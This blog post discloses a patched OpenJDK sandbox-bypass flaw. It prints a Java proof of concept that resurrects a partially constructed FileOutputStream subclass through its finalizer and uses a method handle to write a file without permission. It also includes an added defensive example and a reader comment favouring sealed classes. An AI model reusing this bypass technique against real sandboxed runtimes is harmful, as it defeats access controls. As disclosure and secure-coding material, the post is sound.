# Thursday, January 16, 2014
Publicly Reported OpenJDK Vulnerability Fixed in 7u51

I tweeted a while ago about an OpenJDK vulnerability that was reported on one of the mailing lists.

Now that it has been fixed in 7u51, here is a simple PoC exploit:

```java
import java.lang.invoke.*;

class test extends java.io.FileOutputStream {
  static test t;

  test() throws Exception {
    // Under a security manager the FileOutputStream constructor's permission
    // check throws, so this instance never finishes construction.
    super("");
  }

  // The finalizer still runs on the partially constructed instance and stores
  // a reference to it, resurrecting an object whose constructor never completed.
  protected void finalize() {
    t = this;
  }

  public static void main(String[] args) throws Throwable {
    // Obtain a method handle for the internal open(String, boolean) method.
    MethodHandle mh = MethodHandles.lookup().findVirtual(test.class, "open",
                        MethodType.methodType(void.class, String.class, boolean.class));
    System.out.println(mh);
    try { new test(); } catch (Exception ignored) { }
    System.gc();
    System.runFinalization();
    // Call open() directly on the resurrected instance, which skips the
    // permission check that only the constructor performs.
    mh.invokeExact(t, "oops.txt", false);
  }
}
```

Run this with a security manager enabled on a version earlier than 7u51 and it'll create the file oops.txt, even though the code doesn't have the rights to do so.
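The defensive counterpart, as an added example that is not part of the original post: the guard that the Secure Coding Guidelines for Java recommend for non-final classes whose constructor performs a security check. A final `initialized` flag is assigned only after the check, and every sensitive method tests it, so an instance resurrected from a subclass finalizer is still refused. `GuardedOutput`, `Resurrector` and the path-based policy check are constructed stand-ins for a real class and a real security-manager check.

```java
class GuardedOutput {
  private final boolean initialized;   // stays false if the constructor throws early
  private final String path;

  GuardedOutput(String path) {
    checkWrite(path);                  // may throw before 'initialized' is set
    this.path = path;
    this.initialized = true;           // last statement: reached only if the check passed
  }

  // Constructed stand-in for a security-manager check: denies one directory.
  private static void checkWrite(String path) {
    if (path.startsWith("/forbidden/")) {
      throw new SecurityException("write denied: " + path);
    }
  }

  // Every sensitive method re-validates construction instead of trusting 'this'.
  void open(boolean append) {
    if (!initialized) {
      throw new SecurityException("partially constructed instance");
    }
    System.out.println("opening " + path + (append ? " (append)" : ""));
  }
}

// A subclass can still capture 'this' from finalize() while the superclass
// constructor is throwing, but the captured object has initialized == false.
class Resurrector extends GuardedOutput {
  static Resurrector leaked;

  Resurrector() { super("/forbidden/oops.txt"); }

  @Override protected void finalize() { leaked = this; }

  public static void main(String[] args) {
    new GuardedOutput("/tmp/ok.txt").open(false);       // normal use works
    try { new Resurrector(); } catch (SecurityException e) { }
    System.gc();
    System.runFinalization();
    if (leaked != null) {
      try { leaked.open(false); }                        // refused by the guard
      catch (SecurityException e) { System.out.println("refused: " + e.getMessage()); }
    }
  }
}
```

Making the class `final`, or giving it a private constructor behind a static factory, removes the subclass (and so the finalizer) entirely and is the simpler fix where inheritance is not required.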

Thursday, January 16, 2014 8:50:59 AM (W. Europe Standard Time, UTC+01:00)
Thursday, January 16, 2014 8:11:55 PM (W. Europe Standard Time, UTC+01:00)
Given the many different types of vulnerabilities I have seen on the JVM and the CLR I doubt that any in-process security boundary can be made to work. There's just too much surface area.

The BCL designers mistakenly tried to make many classes inheritable that just shouldn't be inherited from. Why should I ever inherit from FileStream? I can just inherit from Stream and wrap. Why inherit from Regex? Why inherit List<T>? Always a wrong design. Seal everything by default. Not just for security.
tobi